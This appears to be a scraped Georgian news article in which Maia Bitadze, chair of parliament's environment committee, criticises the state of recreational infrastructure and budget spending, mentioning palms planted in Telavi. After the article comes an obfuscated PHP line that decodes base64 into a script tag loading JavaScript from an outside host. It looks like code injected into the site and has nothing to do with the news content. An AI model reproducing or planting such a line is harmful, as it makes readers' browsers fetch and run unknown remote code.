celsiusi
ავერსი საქკაბელი
პარლამენტის გარემოს დაცვის კომიტეტის თავმჯდომარე მაია ბითაძე აცხადებს, რომ საქართველოში რეკრეაციული ინფრასტრუქტურა მძიმე მდგომარეობაშია და საჭიროა, ამ კუთხით თანხების მობილიზება. აღნიშნულ კონტექსში, მაია ბითაძემ მაგალითად მოიყვანა თელავი, სადაც პალმებს რგავენ, რაც მიუღებელია.
 
ამის შესახებ ბითაძემ 4 კომიტეტის გაერთიანებულ სხდომაზე განაცხადა, სადაც ბიუჯეტის კორექტირებულ ვარიანტს განიხლავდნენ. მისი თქმით, სამწუხაროა, რომ გარემოს დაცვის მიმართულებით ბიუჯეტი დიდად არ იცვლება.
 
„უნდა გამოვთქვა უკმაყოფილება იმ კუთხით, რომ როგორც პროგრამულ დაფინანსებებში, ასევე გარემოს დაცვის და სოფლის მეურნეობის სამინისტროს ბიუჯეტის ზრდის პარალელურად, განსაზღვრული არ არის ზრდა გარემოსდაცვითი მიმართულებით. თუმცა იმედი მაქვს, რომ იმ მიმართულებით, რასაც რეკრეაციული ინფრასტრუქტურის განვითარება და რეგიონული განვითარების ფონდში თანხების აკუმულირება ჰქვია, გათვალისწინებული იქნება თანხები რეგიონებში ინფრასტრუქტურის მოწესრიგებისთვის, რაც ძალიან მძიმე მდგომარეობაშია მთელი საქართველოს მასშტაბით.
 
თელავში მაგალითად პალმებს რგავენ, რაც დაუშვებელია. ამ მიმართულებით მთავრობას აქვს ძალიან ამბიციური გეგმა, რომ რეგიონებში რეკრეაციურლი ინფრასტრუქტურა მოწესრიგდეს და იმედი მაქვს, რომ თანხები ამ კუთხითაც დაიხარჯება“, - განაცხადა დეპუტატმა.
 
მაია ბითაძემ სიტყვით გამოსვლისას მწვანე ეკონომიკის დაფინანსების მნიშვნელობასაც გაუსვა ხაზი.
 
 
4401
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");